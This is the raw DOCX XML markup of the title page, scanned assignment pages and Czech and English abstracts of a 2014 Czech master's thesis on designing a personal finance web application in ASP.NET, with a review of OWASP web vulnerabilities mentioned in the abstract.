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4C1DC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C94493" w:rsidRDefault="00680711" w:rsidP="004C1DC7">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>Aplikace pro správu osobních financí</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004C4952" w:rsidRPr="004C4952" w:rsidRDefault="004C4952" w:rsidP="004C1DC7">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004C4952" w:rsidRDefault="004C4952" w:rsidP="004C1DC7">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C94493">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9640" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC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680711" w:rsidP="004C1DC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Bc. Filip Tesař</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C94493">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="3969"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9640" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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930"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C94493" w:rsidRDefault="004F0E44" w:rsidP="004F0E44">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="284" w:right="284"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Diplomová práce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00680711">
              <w:rPr>
                <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>2014</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5387" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C94493" w:rsidRDefault="00A328A5" w:rsidP="004C1DC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4C1DC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4C1DC7">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial Narrow" w:hAnsi="Arial Narrow" w:cs="Arial Narrow"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:sectPr w:rsidR="00C94493" w:rsidSect="004F3D3C">
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1134" w:right="851" w:bottom="851" w:left="1418" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008848C2" w:rsidRDefault="004F0E44" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:sectPr w:rsidR="008848C2" w:rsidSect="004F3D3C">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1701" w:right="1134" w:bottom="1134" w:left="1134" w:header="851" w:footer="709" w:gutter="851"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5514581" cy="8017163"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="Obrázek 26" descr="skenování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nování0001.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9" cstate="print"/>
                    <a:srcRect l="5111" t="16647" r="12751"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="10800000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5516190" cy="8019502"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00C94493">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008848C2" w:rsidRDefault="004F0E44" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5365750" cy="8703888"/>
            <wp:effectExtent l="19050" t="0" r="6350" b="0"/>
            <wp:docPr id="29" name="Obrázek 28" descr="skenování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nování0002.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10" cstate="print"/>
                    <a:srcRect l="3299" t="1518" r="9099" b="4596"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="10800000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5365750" cy="8703888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A001FE" w:rsidRDefault="00864EAD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc37577728"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="8255635"/>
            <wp:effectExtent l="19050" t="0" r="1270" b="0"/>
            <wp:docPr id="18" name="Obrázek 17" descr="skenování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enování0003.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="10800000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="8255635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A001FE">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A001FE" w:rsidRDefault="00C902E5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="2838146"/>
            <wp:effectExtent l="19050" t="0" r="1270" b="0"/>
            <wp:docPr id="1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5580380" cy="2838146"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A001FE">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ABSTRAKT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="006209B0" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r w:rsidRPr="006209B0">
        <w:t>Tato diplomová práce se zabývá aplikacemi pro správu osobních financí.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> V teoretické části je provedena analýza</w:t>
      </w:r>
      <w:r w:rsidR="00847ACB">
        <w:t xml:space="preserve"> relevantních existujících webových řešení a roz</w:t>
      </w:r>
      <w:r w:rsidR="00A116E0">
        <w:t>bor</w:t>
      </w:r>
      <w:r w:rsidR="00847ACB">
        <w:t xml:space="preserve"> největší</w:t>
      </w:r>
      <w:r w:rsidR="00A116E0">
        <w:t>ch</w:t>
      </w:r>
      <w:r w:rsidR="00847ACB">
        <w:t xml:space="preserve"> bezpečnostní</w:t>
      </w:r>
      <w:r w:rsidR="00A116E0">
        <w:t>ch zranitelností</w:t>
      </w:r>
      <w:r w:rsidR="00847ACB">
        <w:t xml:space="preserve"> webových aplikací podle nezávislé organizace OWASP. V praktické části je navrhnuto vlastní řešení problematiky</w:t>
      </w:r>
      <w:r w:rsidR="00A116E0">
        <w:t xml:space="preserve"> ve formě webové aplikace</w:t>
      </w:r>
      <w:r w:rsidR="00847ACB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A116E0">
        <w:t xml:space="preserve"> Jsou vypracovány případy užití a navrhnuto uživatelské rozhraní. Dále se práce věnuje výběru technologií pro implementaci a vytvoření funkčního prototypu aplikace, který je využit pro uživatelské testování. Výsledky tohoto testování jsou v práci popsány spolu s návrhem dalších rozšíření aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006209B0" w:rsidRDefault="006209B0" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A1BBD" w:rsidRDefault="00C94493" w:rsidP="00A831CA">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Klíčová slova: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="002F4BC1" w:rsidP="00F4092C">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="008C67A4">
        <w:t xml:space="preserve">sobní finance, webové aplikace, ASP.NET, </w:t>
      </w:r>
      <w:r w:rsidR="00A831CA">
        <w:t>uživatelská použitelnost, uživatelské testování</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nzev"/>
        <w:pageBreakBefore w:val="0"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:r>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="009A1BBD" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>dissertation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>describes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>applications</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>personal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> finance management. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>theoretical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> part </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>consists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>analysis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>existing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>relevant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>solutions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>reviews</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>largest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> in web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>applications</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>according</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> independent OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>organization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>practical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> part </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>depicts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>solution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>problem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> a web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve">. Use case </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>scenarios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>described</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>well</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> as user interface design </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>concept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>dissertation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>also</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>describes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>selection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>technologies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>implementing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>creating</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t>functional</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A1BBD">
        <w:t xml:space="preserve"> prototype </w:t>
